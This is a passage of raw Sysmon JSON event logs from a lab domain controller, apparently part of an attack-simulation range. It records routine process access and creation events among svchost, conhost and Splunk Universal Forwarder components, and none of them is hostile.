C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:44.742","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6341,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:44.742\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-21A4-5F25-0000-0010D9A00900}\r\nTargetProcessId: 4624\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:44.742","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-21A4-5F25-0000-0010D9A00900}","TargetProcessId":"4624","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6342,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:44.882\r\nSourceProcessGUID: {41C8662E-21A4-5F25-0000-0010D9A00900}\r\nSourceProcessId: 4624\r\nSourceThreadId: 2952\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:44.882","SourceProcessGUID":"{41C8662E-21A4-5F25-0000-0010D9A00900}","SourceProcessId":"4624","SourceThreadId":"2952","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6343,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:45.805\r\nProcessGuid: {41C8662E-21A5-5F25-0000-001026A30900}\r\nProcessId: 4972\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Windows Print Monitor \r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winprintmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:02:45.805","ProcessGuid":"{41C8662E-21A5-5F25-0000-001026A30900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","FileVersion":"8.0.2","Description":"Windows Print Monitor ","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winprintmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:02:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6344,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:45.804\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-21A5-5F25-0000-001026A30900}\r\nTargetProcessId: 4972\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:45.804","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-21A5-5F25-0000-001026A30900}","TargetProcessId":"4972","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6345,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:45.804\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21A5-5F25-0000-001026A30900}\r\nTargetProcessId: 4972\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:45.804","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21A5-5F25-0000-001026A30900}","TargetProcessId":"4972","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:02:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6346,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:45.804\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:45.804","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6347,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:45.804\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:45.804","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6348,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:45.804\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:45.804","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
